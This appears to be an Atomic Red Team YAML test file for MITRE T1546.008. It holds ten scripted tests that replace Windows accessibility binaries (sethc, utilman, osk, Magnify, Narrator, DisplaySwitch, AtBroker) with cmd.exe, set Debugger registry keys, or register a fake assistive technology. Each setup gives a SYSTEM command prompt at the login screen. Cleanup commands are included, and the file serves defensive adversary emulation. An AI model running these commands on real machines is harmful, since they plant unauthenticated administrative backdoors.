Atomic Red Team doc generator
204 lines
11 KiB
YAML
204 lines
11 KiB
YAML
attack_technique: T1546.008
|
|
display_name: 'Event Triggered Execution: Accessibility Features'
|
|
atomic_tests:
|
|
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
|
|
auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
|
|
description: |
|
|
Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
|
|
Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
parent_list:
|
|
description: |
|
|
Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe"
|
|
type: string
|
|
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe
|
|
attached_process:
|
|
description: |
|
|
Full path to process to attach to target in #{parent_list}. Default: cmd.exe
|
|
type: path
|
|
default: C:\windows\system32\cmd.exe
|
|
executor:
|
|
command: |
|
|
$input_table = "#{parent_list}".split(",")
|
|
$Name = "Debugger"
|
|
$Value = "#{attached_process}"
|
|
Foreach ($item in $input_table){
|
|
$item = $item.trim()
|
|
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
|
|
IF(!(Test-Path $registryPath))
|
|
{
|
|
New-Item -Path $registryPath -Force
|
|
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
|
|
}
|
|
ELSE
|
|
{
|
|
New-ItemProperty -Path $registryPath -Name $name -Value $Value
|
|
}
|
|
}
|
|
cleanup_command: |
|
|
$input_table = "#{parent_list}".split(",")
|
|
Foreach ($item in $input_table)
|
|
{
|
|
$item = $item.trim()
|
|
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null
|
|
}
|
|
name: powershell
|
|
elevation_required: true
|
|
- name: Replace binary of sticky keys
|
|
auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
|
|
description: |
|
|
Replace sticky keys binary (sethc.exe) with cmd.exe
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
|
|
takeown /F C:\Windows\System32\sethc.exe /A
|
|
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
|
|
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
|
cleanup_command: |
|
|
copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Create Symbolic Link From osk.exe to cmd.exe
|
|
auto_generated_guid: 51ef369c-5e87-4f33-88cd-6d61be63edf2
|
|
description: |
|
|
Replace accessiblity executable with cmd.exe to provide elevated command prompt from login screen without logging in.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
|
|
takeown /F %windir%\System32\osk.exe /A
|
|
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
|
del %windir%\System32\osk.exe
|
|
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
|
|
cleanup_command: |
|
|
takeown /F %windir%\System32\osk.exe /A
|
|
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
|
del %windir%\System32\osk.exe
|
|
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
|
|
icacls %windir%\system32\osk.exe /inheritance:d
|
|
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
|
|
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
|
|
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
|
|
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
|
|
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
|
|
description: |
|
|
Executes code specified in the registry for a new AT (Assistive Technologies).
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
|
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
|
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
|
|
atbroker /start malware_test
|
|
cleanup_command: |
|
|
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Auto-start application on user logon
|
|
auto_generated_guid: 7125eba8-7b30-426b-9147-781d152be6fb
|
|
description: |
|
|
Executes code specified in the registry on new user logon session automatically by registration of new AT and modification of configuration value.
|
|
This test will register new AT named malware_test with code for cmd.exe and add a configuration value for the code to be run during user logon session.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
|
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
|
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
|
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /t REG_SZ /d malware_test /f
|
|
cleanup_command: |
|
|
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
|
|
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Replace utilman.exe (Ease of Access Binary) with cmd.exe
|
|
auto_generated_guid: 1db380da-3422-481d-a3c8-6d5770dba580
|
|
description: |
|
|
Replace utilman.exe (Ease of Access binary) with cmd.exe. This allows the user to launch an elevated command prompt by clicking the Ease of Access button on the login screen.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
IF NOT EXIST C:\Windows\System32\utilman_backup.exe (copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman_backup.exe) ELSE ( pushd )
|
|
takeown /F C:\Windows\System32\utilman.exe /A
|
|
icacls C:\Windows\System32\utilman.exe /grant Administrators:F /t
|
|
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
|
|
cleanup_command: |
|
|
copy /Y C:\Windows\System32\utilman_backup.exe C:\Windows\System32\utilman.exe
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Replace Magnify.exe (Magnifier binary) with cmd.exe
|
|
auto_generated_guid: 5e4fa70d-c789-470e-85e1-6992b92bb321
|
|
description: |
|
|
Replace Magnify.exe (Magnifier binary) with cmd.exe. This allows the user to launch an elevated command prompt by toggling on the Magnifier from the Accessibility menu on the login screen.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
IF NOT EXIST C:\Windows\System32\Magnify_backup.exe (copy C:\Windows\System32\Magnify.exe C:\Windows\System32\Magnify_backup.exe) ELSE ( pushd )
|
|
takeown /F C:\Windows\System32\Magnify.exe /A
|
|
icacls C:\Windows\System32\Magnify.exe /grant Administrators:F /t
|
|
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\Magnify.exe
|
|
cleanup_command: |
|
|
copy /Y C:\Windows\System32\Magnify_backup.exe C:\Windows\System32\Magnify.exe
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Replace Narrator.exe (Narrator binary) with cmd.exe
|
|
auto_generated_guid: 2002f5ea-cd13-4c82-bf73-e46722e5dc5e
|
|
description: |
|
|
Replace Narrator.exe (Narrator binary) with cmd.exe. This allows the user to launch an elevated command prompt by toggling on the Narrator button from the Accessibility menu on the login screen.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
IF NOT EXIST C:\Windows\System32\Narrator_backup.exe (copy C:\Windows\System32\Narrator.exe C:\Windows\System32\Narrator_backup.exe) ELSE ( pushd )
|
|
takeown /F C:\Windows\System32\Narrator.exe /A
|
|
icacls C:\Windows\System32\Narrator.exe /grant Administrators:F /t
|
|
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\Narrator.exe
|
|
cleanup_command: |
|
|
copy /Y C:\Windows\System32\Narrator_backup.exe C:\Windows\System32\Narrator.exe
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
|
|
auto_generated_guid: 825ba8ca-71cc-436b-b1dd-ea0d5e109086
|
|
description: |
|
|
Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt by pressing the Windows Key + P on the login screen.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
|
|
takeown /F C:\Windows\System32\DisplaySwitch.exe /A
|
|
icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
|
|
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
|
|
cleanup_command: |
|
|
copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
|
|
auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
|
|
description: |
|
|
Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
|
|
takeown /F C:\Windows\System32\AtBroker.exe /A
|
|
icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
|
|
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
|
|
cleanup_command: |
|
|
copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
|
|
name: command_prompt
|
|
elevation_required: true
|